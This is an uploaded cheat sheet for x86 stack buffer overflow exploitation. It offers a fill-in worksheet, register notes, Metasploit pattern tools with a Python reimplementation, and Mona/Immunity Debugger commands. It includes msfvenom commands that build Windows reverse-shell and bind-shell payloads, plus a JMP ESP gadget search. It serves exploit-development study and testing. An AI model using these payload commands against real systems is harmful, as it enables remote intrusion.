Fun With Buffer Overflow Cheat Sheet

This document provides notes on buffer overflow exploitation, including register values after exploitation, finding offsets, bad characters, shellcode creation, and debugger tools and commands. The notes cover creating reverse and bind shell payloads, examining register values with a debugger, using pattern_create.rb and pattern_offset.rb to find offsets, and Mona and Immunity Debugger commands.

Uploaded by Mefistogr

Notes:

Appendix A - Fun with X86 buffer overflow ver1.2


Date:
Program name:
Version:
CVE:
Vuln:
Exploit web link:
Do I have a proof of concept (POC)?
What OS? What version?
What debugger?
TCP/UDP:
Shell type (L/R):
Port:
Rhost =
Injected variable (ex. \x41):
Notes:
Register table (columns: number, bytes, address, value, register):
Fuzz program with what strict pattern?:
HEX value of EIP after strict pattern:
HEX value of ESP after strict pattern:
Delimiter (ex. "\r\n"):
Fuzz program with pattern.rb?
Get EIP:
What was the offset.rb?
Get ESP:
Which registers can help us?
Get the offset number:
Badchars (in the stack):
Look for little endian in the stack:
JMP ESP:
Buffer size / buffer length:
Shell code size and payload type:
Number of nops needed ("\x90"):
Big-endian to little-endian conversion (big-endian / little-endian):

Create shell codes (note: '//' means the command continues on the next line). # A standard reverse shell payload size is 300 to 400 bytes
msfvenom -p windows/shell_reverse_tcp LHOST=<ipaddress> LPORT=443 -f c -a x86 --platform windows -b "\x00\x0a\x0d" //
-e x86/shikata_ga_nai > windows_reverse_shell_code
msfvenom -p windows/shell_bind_tcp -f c
If you are curious about what the raw shellcode looks like, pipe it to ndisasm (-u selects 32-bit mode, '-' reads from stdin):
msfvenom -p windows/shell_bind_tcp -f raw | ndisasm -u -
pattern_create.rb location on Kali 2017:
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb
Options:
-l, --length <length> The length of the pattern
-s, --sets <ABC,def,123> Custom pattern sets
-h, --help Show this message
pattern_offset.rb location on Kali 2017:
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb
Options:
-q, --query Aa0A Query to locate
nasm_shell.rb location: /usr/share/metasploit-framework/tools/nasm_shell.rb
nasm> jmp esp

X86 assembly registers
EIP stores the pointer to the next instruction to be executed.
EAX (accumulator register) used in arithmetic operations.
ECX (counter register) used in shift/rotate instructions and loops.
EDX (data register) used in arithmetic operations and data (I/O) ops.
EBX (base register) used as a pointer to data.
ESP (stack pointer register) points to the current stack location, i.e. the address at the top of the stack.
EBP (base pointer register) used to point to the base of the stack.
ESI (source index register) used as a pointer to the source in stream operations.
EDI (destination index register) used as a pointer to the destination in stream operations.
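To make clear what the offset number produced by pattern_create.rb and pattern_offset.rb means, and how the big-endian to little-endian step above works, here is an added Python reimplementation of both; it is example code written for these notes, not Metasploit's own scripts, and it assumes hex EIP values are given with a 0x prefix (a simplification of pattern_offset.rb's parsing). The address 0x5f4a358f is a constructed sample, not a real one.

```python
import string
import struct

# Uppercase x lowercase x digit triples give 20280 bytes before the
# sequence would repeat, so any 4-byte window below that is unique.
MAX_UNIQUE = 26 * 26 * 10 * 3


def pattern_create(length):
    """Return the first `length` characters of the cyclic pattern Aa0Aa1Aa2...
    (the same sequence pattern_create.rb emits with its default sets).
    Capped at MAX_UNIQUE so every 4-byte window stays unique."""
    triples = (u + l + d for u in string.ascii_uppercase
               for l in string.ascii_lowercase
               for d in string.digits)
    return "".join(triples)[:min(length, MAX_UNIQUE)]


def pattern_offset(query, length=MAX_UNIQUE):
    """Locate `query` in the pattern, as pattern_offset.rb -q does.
    `query` is either the 4 ASCII characters or the dword the debugger shows
    in EIP written as 0x........ (assumption: hex always carries the 0x prefix).
    The CPU stored that dword little-endian, so its bytes are reversed to
    recover the ASCII run. Returns the zero-based offset, or None when the
    value is not in the pattern (EIP was not overwritten by the pattern)."""
    if query.lower().startswith("0x"):
        needle = struct.pack("<I", int(query, 16)).decode("ascii", errors="replace")
    else:
        needle = query
    index = pattern_create(length).find(needle)
    return None if index < 0 else index


def to_little_endian(address):
    """Convert an address as printed by the debugger (big-endian, e.g.
    0x5f4a358f) into the byte order it must have inside the buffer
    (bytes 8f 35 4a 5f), which is what the \\x.. escapes in an exploit
    string spell out."""
    return struct.pack("<I", address)


if __name__ == "__main__":
    print(pattern_create(30))                    # Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9
    print(pattern_offset("0x41326241"))          # 36
    print(pattern_offset("Ab2A"))                # 36
    print(to_little_endian(0x5f4a358f).hex())    # 8f354a5f
```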
Immunity cheats: F2 sets a breakpoint.
If you need to know what anything in the toolbar does, hover the mouse over its name and a description appears in the bottom grey bar.
Mona commands: '!mona modules', '!mona find -s "\xff\xe4" -m slmfc.dll' and choose an address with no bad chars.
pycommands: "auto_start, auto_table, auto_attach, custom_search JMP ESP"
Notes:
